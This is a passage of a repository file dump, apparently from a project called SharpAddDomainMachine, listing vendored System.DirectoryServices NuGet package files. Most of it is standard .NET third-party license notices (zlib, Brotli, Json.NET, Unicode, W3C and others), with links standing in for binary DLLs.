220 | The name and trademarks of copyright holders may NOT be used in advertising or publicity pertaining to the work without specific, written prior permission. Title to copyright in this work will at all times remain with copyright holders."
221 |
222 | License notice for Bit Twiddling Hacks
223 | --------------------------------------
224 |
225 | Bit Twiddling Hacks
226 |
227 | By Sean Eron Anderson
228 | seander@cs.stanford.edu
229 |
230 | Individually, the code snippets here are in the public domain (unless otherwise
231 | noted) — feel free to use them however you please. The aggregate collection and
232 | descriptions are © 1997-2005 Sean Eron Anderson. The code and descriptions are
233 | distributed in the hope that they will be useful, but WITHOUT ANY WARRANTY and
234 | without even the implied warranty of merchantability or fitness for a particular
235 | purpose.
236 |
237 | License notice for Brotli
238 | --------------------------------------
239 |
240 | Copyright (c) 2009, 2010, 2013-2016 by the Brotli Authors.
241 |
242 | Permission is hereby granted, free of charge, to any person obtaining a copy
243 | of this software and associated documentation files (the "Software"), to deal
244 | in the Software without restriction, including without limitation the rights
245 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
246 | copies of the Software, and to permit persons to whom the Software is
247 | furnished to do so, subject to the following conditions:
248 |
249 | The above copyright notice and this permission notice shall be included in
250 | all copies or substantial portions of the Software.
251 |
252 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
253 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
254 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
255 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
256 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
257 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
258 | THE SOFTWARE.
259 |
260 | compress_fragment.c:
261 | Copyright (c) 2011, Google Inc.
262 | All rights reserved.
263 |
264 | Redistribution and use in source and binary forms, with or without
265 | modification, are permitted provided that the following conditions are
266 | met:
267 |
268 | * Redistributions of source code must retain the above copyright
269 | notice, this list of conditions and the following disclaimer.
270 | * Redistributions in binary form must reproduce the above
271 | copyright notice, this list of conditions and the following disclaimer
272 | in the documentation and/or other materials provided with the
273 | distribution.
274 | * Neither the name of Google Inc. nor the names of its
275 | contributors may be used to endorse or promote products derived from
276 | this software without specific prior written permission.
277 |
278 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
279 | ""AS IS"" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
280 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
281 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
282 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
283 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
284 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
285 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
286 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
287 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
288 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
289 |
290 | decode_fuzzer.c:
291 | Copyright (c) 2015 The Chromium Authors. All rights reserved.
292 |
293 | Redistribution and use in source and binary forms, with or without
294 | modification, are permitted provided that the following conditions are
295 | met:
296 |
297 | * Redistributions of source code must retain the above copyright
298 | notice, this list of conditions and the following disclaimer.
299 | * Redistributions in binary form must reproduce the above
300 | copyright notice, this list of conditions and the following disclaimer
301 | in the documentation and/or other materials provided with the
302 | distribution.
303 | * Neither the name of Google Inc. nor the names of its
304 | contributors may be used to endorse or promote products derived from
305 | this software without specific prior written permission.
306 |
307 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
308 | ""AS IS"" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
309 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
310 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
311 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
312 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
313 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
314 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
315 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
316 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
317 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
318 |
319 | License notice for Json.NET
320 | -------------------------------
321 |
322 | https://github.com/JamesNK/Newtonsoft.Json/blob/master/LICENSE.md
323 |
324 | The MIT License (MIT)
325 |
326 | Copyright (c) 2007 James Newton-King
327 |
328 | Permission is hereby granted, free of charge, to any person obtaining a copy of
329 | this software and associated documentation files (the "Software"), to deal in
330 | the Software without restriction, including without limitation the rights to
331 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
332 | the Software, and to permit persons to whom the Software is furnished to do so,
333 | subject to the following conditions:
334 |
335 | The above copyright notice and this permission notice shall be included in all
336 | copies or substantial portions of the Software.
337 |
338 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
339 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
340 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
341 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
342 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
343 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
344 |
345 | License notice for vectorized base64 encoding / decoding
346 | --------------------------------------------------------
347 |
348 | Copyright (c) 2005-2007, Nick Galbreath
349 | Copyright (c) 2013-2017, Alfred Klomp
350 | Copyright (c) 2015-2017, Wojciech Mula
351 | Copyright (c) 2016-2017, Matthieu Darbois
352 | All rights reserved.
353 |
354 | Redistribution and use in source and binary forms, with or without
355 | modification, are permitted provided that the following conditions are
356 | met:
357 |
358 | - Redistributions of source code must retain the above copyright notice,
359 | this list of conditions and the following disclaimer.
360 |
361 | - Redistributions in binary form must reproduce the above copyright
362 | notice, this list of conditions and the following disclaimer in the
363 | documentation and/or other materials provided with the distribution.
364 |
365 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
366 | IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
367 | TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
368 | PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
369 | HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
370 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
371 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
372 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
373 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
374 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
375 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
376 |
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/lib/net45/_._:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/lib/net45/_._
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/lib/netstandard2.0/System.DirectoryServices.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/lib/netstandard2.0/System.DirectoryServices.dll
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/ref/net45/_._:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/ref/net45/_._
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/ref/netstandard2.0/System.DirectoryServices.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/ref/netstandard2.0/System.DirectoryServices.dll
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/runtimes/win/lib/net45/_._:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/runtimes/win/lib/net45/_._
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/runtimes/win/lib/netcoreapp2.0/System.DirectoryServices.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/runtimes/win/lib/netcoreapp2.0/System.DirectoryServices.dll
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/useSharedDesignerContext.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.4.7.0/useSharedDesignerContext.txt
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.4.7.0/version.txt:
--------------------------------------------------------------------------------
1 | 0f7f38c4fd323b26da10cce95f857f77f0f09b48
2 |
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/.signature.p7s
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/LICENSE.TXT:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) .NET Foundation and Contributors
4 |
5 | All rights reserved.
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/System.DirectoryServices.Protocols.4.7.0.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/SharpAddDomainMachine/dbf1c414dc001ef5656d7328336231647c101e34/packages/System.DirectoryServices.Protocols.4.7.0/System.DirectoryServices.Protocols.4.7.0.nupkg
--------------------------------------------------------------------------------
/packages/System.DirectoryServices.Protocols.4.7.0/THIRD-PARTY-NOTICES.TXT:
--------------------------------------------------------------------------------
1 | .NET Core uses third-party libraries or other resources that may be
2 | distributed under licenses different than the .NET Core software.
3 |
4 | In the event that we accidentally failed to list a required notice, please
5 | bring it to our attention. Post an issue or email us:
6 |
7 | dotnet@microsoft.com
8 |
9 | The attached notices are provided for information only.
10 |
11 | License notice for ASP.NET
12 | -------------------------------
13 |
14 | Copyright (c) .NET Foundation. All rights reserved.
15 | Licensed under the Apache License, Version 2.0.
16 |
17 | Available at
18 | https://github.com/aspnet/AspNetCore/blob/master/LICENSE.txt
19 |
20 | License notice for Slicing-by-8
21 | -------------------------------
22 |
23 | http://sourceforge.net/projects/slicing-by-8/
24 |
25 | Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved
26 |
27 |
28 | This software program is licensed subject to the BSD License, available at
29 | http://www.opensource.org/licenses/bsd-license.html.
30 |
31 |
32 | License notice for Unicode data
33 | -------------------------------
34 |
35 | http://www.unicode.org/copyright.html#License
36 |
37 | Copyright © 1991-2017 Unicode, Inc. All rights reserved.
38 | Distributed under the Terms of Use in http://www.unicode.org/copyright.html.
39 |
40 | Permission is hereby granted, free of charge, to any person obtaining
41 | a copy of the Unicode data files and any associated documentation
42 | (the "Data Files") or Unicode software and any associated documentation
43 | (the "Software") to deal in the Data Files or Software
44 | without restriction, including without limitation the rights to use,
45 | copy, modify, merge, publish, distribute, and/or sell copies of
46 | the Data Files or Software, and to permit persons to whom the Data Files
47 | or Software are furnished to do so, provided that either
48 | (a) this copyright and permission notice appear with all copies
49 | of the Data Files or Software, or
50 | (b) this copyright and permission notice appear in associated
51 | Documentation.
52 |
53 | THE DATA FILES AND SOFTWARE ARE PROVIDED "AS IS", WITHOUT WARRANTY OF
54 | ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
55 | WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
56 | NONINFRINGEMENT OF THIRD PARTY RIGHTS.
57 | IN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS INCLUDED IN THIS
58 | NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL
59 | DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
60 | DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
61 | TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
62 | PERFORMANCE OF THE DATA FILES OR SOFTWARE.
63 |
64 | Except as contained in this notice, the name of a copyright holder
65 | shall not be used in advertising or otherwise to promote the sale,
66 | use or other dealings in these Data Files or Software without prior
67 | written authorization of the copyright holder.
68 |
69 | License notice for Zlib
70 | -----------------------
71 |
72 | https://github.com/madler/zlib
73 | http://zlib.net/zlib_license.html
74 |
75 | /* zlib.h -- interface of the 'zlib' general purpose compression library
76 | version 1.2.11, January 15th, 2017
77 |
78 | Copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler
79 |
80 | This software is provided 'as-is', without any express or implied
81 | warranty. In no event will the authors be held liable for any damages
82 | arising from the use of this software.
83 |
84 | Permission is granted to anyone to use this software for any purpose,
85 | including commercial applications, and to alter it and redistribute it
86 | freely, subject to the following restrictions:
87 |
88 | 1. The origin of this software must not be misrepresented; you must not
89 | claim that you wrote the original software. If you use this software
90 | in a product, an acknowledgment in the product documentation would be
91 | appreciated but is not required.
92 | 2. Altered source versions must be plainly marked as such, and must not be
93 | misrepresented as being the original software.
94 | 3. This notice may not be removed or altered from any source distribution.
95 |
96 | Jean-loup Gailly Mark Adler
97 | jloup@gzip.org madler@alumni.caltech.edu
98 |
99 | */
100 |
101 | License notice for Mono
102 | -------------------------------
103 |
104 | http://www.mono-project.com/docs/about-mono/
105 |
106 | Copyright (c) .NET Foundation Contributors
107 |
108 | MIT License
109 |
110 | Permission is hereby granted, free of charge, to any person obtaining a copy
111 | of this software and associated documentation files (the Software), to deal
112 | in the Software without restriction, including without limitation the rights
113 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
114 | copies of the Software, and to permit persons to whom the Software is
115 | furnished to do so, subject to the following conditions:
116 |
117 | The above copyright notice and this permission notice shall be included in all
118 | copies or substantial portions of the Software.
119 |
120 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
121 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
122 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
123 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
124 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
125 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
126 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
127 |
128 | License notice for International Organization for Standardization
129 | -----------------------------------------------------------------
130 |
131 | Portions (C) International Organization for Standardization 1986:
132 | Permission to copy in any form is granted for use with
133 | conforming SGML systems and applications as defined in
134 | ISO 8879, provided this notice is included in all copies.
135 |
136 | License notice for Intel
137 | ------------------------
138 |
139 | "Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved
140 |
141 | Redistribution and use in source and binary forms, with or without
142 | modification, are permitted provided that the following conditions are met:
143 |
144 | 1. Redistributions of source code must retain the above copyright notice, this
145 | list of conditions and the following disclaimer.
146 |
147 | 2. Redistributions in binary form must reproduce the above copyright notice,
148 | this list of conditions and the following disclaimer in the documentation
149 | and/or other materials provided with the distribution.
150 |
151 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
152 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
153 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
154 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
155 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
156 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
157 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
158 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
159 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
160 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
161 |
162 | License notice for Xamarin and Novell
163 | -------------------------------------
164 |
165 | Copyright (c) 2015 Xamarin, Inc (http://www.xamarin.com)
166 |
167 | Permission is hereby granted, free of charge, to any person obtaining a copy
168 | of this software and associated documentation files (the "Software"), to deal
169 | in the Software without restriction, including without limitation the rights
170 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
171 | copies of the Software, and to permit persons to whom the Software is
172 | furnished to do so, subject to the following conditions:
173 |
174 | The above copyright notice and this permission notice shall be included in
175 | all copies or substantial portions of the Software.
176 |
177 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
178 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
179 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
180 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
181 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
182 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
183 | THE SOFTWARE.
184 |
185 | Copyright (c) 2011 Novell, Inc (http://www.novell.com)
186 |
187 | Permission is hereby granted, free of charge, to any person obtaining a copy
188 | of this software and associated documentation files (the "Software"), to deal
189 | in the Software without restriction, including without limitation the rights
190 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
191 | copies of the Software, and to permit persons to whom the Software is
192 | furnished to do so, subject to the following conditions:
193 |
194 | The above copyright notice and this permission notice shall be included in
195 | all copies or substantial portions of the Software.
196 |
197 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
198 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
199 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
200 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
201 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
202 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
203 | THE SOFTWARE.
204 |
205 | Third party notice for W3C
206 | --------------------------
207 |
208 | "W3C SOFTWARE AND DOCUMENT NOTICE AND LICENSE
209 | Status: This license takes effect 13 May, 2015.
210 | This work is being provided by the copyright holders under the following license.
211 | License
212 | By obtaining and/or copying this work, you (the licensee) agree that you have read, understood, and will comply with the following terms and conditions.
213 | Permission to copy, modify, and distribute this work, with or without modification, for any purpose and without fee or royalty is hereby granted, provided that you include the following on ALL copies of the work or portions thereof, including modifications:
214 | The full text of this NOTICE in a location viewable to users of the redistributed or derivative work.
215 | Any pre-existing intellectual property disclaimers, notices, or terms and conditions. If none exist, the W3C Software and Document Short Notice should be included.
216 | Notice of any changes or modifications, through a copyright statement on the new code or document such as "This software or document includes material copied from or derived from [title and URI of the W3C document]. Copyright © [YEAR] W3C® (MIT, ERCIM, Keio, Beihang)."
217 | Disclaimers
218 | THIS WORK IS PROVIDED "AS IS," AND COPYRIGHT HOLDERS MAKE NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE OR DOCUMENT WILL NOT INFRINGE ANY THIRD PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS.
219 | COPYRIGHT HOLDERS WILL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF ANY USE OF THE SOFTWARE OR DOCUMENT.
220 | The name and trademarks of copyright holders may NOT be used in advertising or publicity pertaining to the work without specific, written prior permission. Title to copyright in this work will at all times remain with copyright holders."
221 |
222 | License notice for Bit Twiddling Hacks
223 | --------------------------------------
224 |
225 | Bit Twiddling Hacks
226 |
227 | By Sean Eron Anderson
228 | seander@cs.stanford.edu
229 |
230 | Individually, the code snippets here are in the public domain (unless otherwise
231 | noted) — feel free to use them however you please. The aggregate collection and
232 | descriptions are © 1997-2005 Sean Eron Anderson. The code and descriptions are
233 | distributed in the hope that they will be useful, but WITHOUT ANY WARRANTY and
234 | without even the implied warranty of merchantability or fitness for a particular
235 | purpose.
236 |
237 | License notice for Brotli
238 | --------------------------------------
239 |
240 | Copyright (c) 2009, 2010, 2013-2016 by the Brotli Authors.
241 |
242 | Permission is hereby granted, free of charge, to any person obtaining a copy
243 | of this software and associated documentation files (the "Software"), to deal
244 | in the Software without restriction, including without limitation the rights
245 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
246 | copies of the Software, and to permit persons to whom the Software is
247 | furnished to do so, subject to the following conditions:
248 |
249 | The above copyright notice and this permission notice shall be included in
250 | all copies or substantial portions of the Software.
251 |
252 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
253 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
254 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
255 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
256 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
257 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
258 | THE SOFTWARE.
259 |
260 | compress_fragment.c:
261 | Copyright (c) 2011, Google Inc.
262 | All rights reserved.
263 |
264 | Redistribution and use in source and binary forms, with or without
265 | modification, are permitted provided that the following conditions are
266 | met:
267 |
268 | * Redistributions of source code must retain the above copyright
269 | notice, this list of conditions and the following disclaimer.
270 | * Redistributions in binary form must reproduce the above
271 | copyright notice, this list of conditions and the following disclaimer
272 | in the documentation and/or other materials provided with the
273 | distribution.
274 | * Neither the name of Google Inc. nor the names of its
275 | contributors may be used to endorse or promote products derived from
276 | this software without specific prior written permission.
277 |
278 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
279 | ""AS IS"" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
280 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
281 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
282 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
283 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
284 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
285 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
286 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
287 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
288 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
289 |
290 | decode_fuzzer.c:
291 | Copyright (c) 2015 The Chromium Authors. All rights reserved.
292 |
293 | Redistribution and use in source and binary forms, with or without
294 | modification, are permitted provided that the following conditions are
295 | met:
296 |
297 | * Redistributions of source code must retain the above copyright
298 | notice, this list of conditions and the following disclaimer.
299 | * Redistributions in binary form must reproduce the above
300 | copyright notice, this list of conditions and the following disclaimer
301 | in the documentation and/or other materials provided with the
302 | distribution.
303 | * Neither the name of Google Inc. nor the names of its
304 | contributors may be used to endorse or promote products derived from
305 | this software without specific prior written permission.
306 |
307 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
308 | ""AS IS"" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
309 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
310 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
311 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
312 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
313 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
314 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
315 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
316 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
317 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
318 |
319 | License notice for Json.NET
320 | -------------------------------
321 |
322 | https://github.com/JamesNK/Newtonsoft.Json/blob/master/LICENSE.md
323 |
324 | The MIT License (MIT)
325 |
326 | Copyright (c) 2007 James Newton-King
327 |
328 | Permission is hereby granted, free of charge, to any person obtaining a copy of
329 | this software and associated documentation files (the "Software"), to deal in
330 | the Software without restriction, including without limitation the rights to
331 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
332 | the Software, and to permit persons to whom the Software is furnished to do so,
333 | subject to the following conditions:
334 |
335 | The above copyright notice and this permission notice shall be included in all
336 | copies or substantial portions of the Software.
337 |
338 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
339 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
340 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
